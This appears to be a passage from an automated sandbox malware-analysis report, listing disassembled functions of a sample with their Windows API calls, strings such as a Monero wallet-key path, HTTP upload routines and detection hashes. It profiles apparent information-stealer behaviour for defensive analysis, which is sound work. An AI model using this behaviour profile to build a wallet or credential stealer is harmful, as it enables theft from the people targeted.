Part of subcall function 00BFAA70: StrCmpCA.SHLWAPI(01739120,00BEA7A7,?,00BEA7A7,01739120), ref: 00BFAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BEAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 00BEAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 00BEABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BEA8B0

Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

lstrcat.KERNEL32(?,00000000), ref: 00BEACEB
lstrcat.KERNEL32(?,00C01320), ref: 00BEACFA
lstrcat.KERNEL32(?,00000000), ref: 00BEAD0D
lstrcat.KERNEL32(?,00C01324), ref: 00BEAD1C
lstrcat.KERNEL32(?,00000000), ref: 00BEAD2F
lstrcat.KERNEL32(?,00C01328), ref: 00BEAD3E
lstrcat.KERNEL32(?,00000000), ref: 00BEAD51
lstrcat.KERNEL32(?,00C0132C), ref: 00BEAD60
lstrcat.KERNEL32(?,00000000), ref: 00BEAD73
lstrcat.KERNEL32(?,00C01330), ref: 00BEAD82
lstrcat.KERNEL32(?,00000000), ref: 00BEAD95
lstrcat.KERNEL32(?,00C01334), ref: 00BEADA4
lstrcat.KERNEL32(?,00000000), ref: 00BEADB7
lstrlen.KERNEL32(?), ref: 00BEAE0D
lstrlen.KERNEL32(?), ref: 00BEAE1C

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

DeleteFileA.KERNEL32(00000000), ref: 00BEAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00BEABD4

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 2e9c5427bd91ed230b4e670440e21174798deb11430ed179aa3c899a685347bb
Instruction ID: 8b51271f3090e9e734e5238e7fa708e48150a632816237cf4583bd39c60c10cc
Opcode Fuzzy Hash: 2e9c5427bd91ed230b4e670440e21174798deb11430ed179aa3c899a685347bb
Instruction Fuzzy Hash: 4B12EFB19101089BDB1CEBA5DD96DFE73B8AF14301F5441A8B60AB7091DF746E0ECB62

Function 00BE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE59F8
StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0173E9B8,00000000,?,0173A700,00000000,?,00C01A1C), ref: 00BE5E71
lstrlen.KERNEL32(00000000), ref: 00BE5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00BE5E93
RtlAllocateHeap.NTDLL(00000000), ref: 00BE5E9A
lstrlen.KERNEL32(00000000), ref: 00BE5EAF
lstrlen.KERNEL32(00000000), ref: 00BE5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00BE5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BE5F4C
InternetCloseHandle.WININET(00000000), ref: 00BE5FB0
InternetCloseHandle.WININET(00000000), ref: 00BE5FBD
HttpOpenRequestA.WININET(00000000,0173EAC8,?,0173E1F8,00000000,00000000,00400100,00000000), ref: 00BE5BF8

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

InternetCloseHandle.WININET(00000000), ref: 00BE5FC7

Strings

", xrefs: 00BE5CD5
", xrefs: 00BE5E16
------, xrefs: 00BE5A96
------, xrefs: 00BE5D4C
------, xrefs: 00BE5C0B

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: b513da036526a1f8d5176ae1a61c9c418b63003a2a2a7e70ae47b10ce80742fe
Instruction ID: 0195d8d061bccbc72d65bdbd68d2a423c5ed81ceea2e2745b27c0f788e8e912f
Opcode Fuzzy Hash: b513da036526a1f8d5176ae1a61c9c418b63003a2a2a7e70ae47b10ce80742fe
Instruction Fuzzy Hash: C712DFB181011CABDB19EBA4DC95FEEB3B8BF14740F5441A9B20A73091DF706A4ECB55

Function 00BECEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,0173A670,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BECF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BED0C7
RtlAllocateHeap.NTDLL(00000000), ref: 00BED0CE
lstrcat.KERNEL32(?,00000000), ref: 00BED208
lstrcat.KERNEL32(?,00C01478), ref: 00BED217
lstrcat.KERNEL32(?,00000000), ref: 00BED22A
lstrcat.KERNEL32(?,00C0147C), ref: 00BED239
lstrcat.KERNEL32(?,00000000), ref: 00BED24C
lstrcat.KERNEL32(?,00C01480), ref: 00BED25B
lstrcat.KERNEL32(?,00000000), ref: 00BED26E
lstrcat.KERNEL32(?,00C01484), ref: 00BED27D
lstrcat.KERNEL32(?,00000000), ref: 00BED290
lstrcat.KERNEL32(?,00C01488), ref: 00BED29F
lstrcat.KERNEL32(?,00000000), ref: 00BED2B2
lstrcat.KERNEL32(?,00C0148C), ref: 00BED2C1
lstrcat.KERNEL32(?,00000000), ref: 00BED2D4
lstrcat.KERNEL32(?,00C01490), ref: 00BED2E3

Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885

lstrlen.KERNEL32(?), ref: 00BED32A
lstrlen.KERNEL32(?), ref: 00BED339

Part of subcall function 00BFAA70: StrCmpCA.SHLWAPI(01739120,00BEA7A7,?,00BEA7A7,01739120), ref: 00BFAA8F

DeleteFileA.KERNEL32(00000000), ref: 00BED3B4

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 70a7f0fad9b5259dc457282412e296ad33439a132d2f32a70765e6ca530ba322
Instruction ID: a17975ea92a74ac832e9a86593e8038d04fd64ce7c16ee321dedcf79641d05a8
Opcode Fuzzy Hash: 70a7f0fad9b5259dc457282412e296ad33439a132d2f32a70765e6ca530ba322
Instruction Fuzzy Hash: 4FE1D3B19101099BCB18EBA5DD96EFE73B8AF14301F1441A4F606B7091DF756E0ECB62

Function 00BF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

RegOpenKeyExA.KERNEL32(00000000,0173B7B8,00000000,00020019,00000000,00C005B6), ref: 00BF83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
wsprintfA.USER32 ref: 00BF8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
RegCloseKey.ADVAPI32(00000000), ref: 00BF8499

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Strings

?, xrefs: 00BF837A
- , xrefs: 00BF85A3
%s\%s, xrefs: 00BF844D

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: c5ee35f02f0235ecbae9f2e829b66cf503b47650b7e31cb4a92c62d1247cf8a4
Instruction ID: d0af570dfe9c51d9e901fa7f2556ccdd722a383c13c6195232be0d896b840528
Opcode Fuzzy Hash: c5ee35f02f0235ecbae9f2e829b66cf503b47650b7e31cb4a92c62d1247cf8a4
Instruction Fuzzy Hash: 4781DDB191011CABDB28DB54CC95FEAB7B8FB48700F0086D9E209A7190DF716B89CF95

Function 00BE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
HttpOpenRequestA.WININET(00000000,GET,?,0173E1F8,00000000,00000000,00400100,00000000), ref: 00BE6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BE63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE646D
InternetCloseHandle.WININET(00000000), ref: 00BE64EF
InternetCloseHandle.WININET(00000000), ref: 00BE64F9
InternetCloseHandle.WININET(00000000), ref: 00BE6503

Strings

ERROR, xrefs: 00BE6407
ERROR, xrefs: 00BE64C9
GET, xrefs: 00BE637C

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 73f7bddc197a060bc62ab2f3a09d5c14b2ea0dc1043fb5c6a0a62a69f51d4f49
Instruction ID: c359e3c36ebb0ec669479e648d05a661188dcf3554032e932eff5fc67187f769
Opcode Fuzzy Hash: 73f7bddc197a060bc62ab2f3a09d5c14b2ea0dc1043fb5c6a0a62a69f51d4f49
Instruction Fuzzy Hash: FB715E71A00258AFDB24DB95CC49FEEB7B8FB54700F1081A9F6096B1D0DBB46A89CF51

Function 00BF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5857

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5228

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5318
Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF532F
Part of subcall function 00BF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BF5364
Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF5383
Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5A0C
Sleep.KERNEL32(0000EA60), ref: 00BF5A1B

Strings

ERROR, xrefs: 00BF5849
ERROR, xrefs: 00BF59FE
ERROR, xrefs: 00BF5932
ERROR, xrefs: 00BF5693
ERROR, xrefs: 00BF5636
ERROR, xrefs: 00BF577D

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
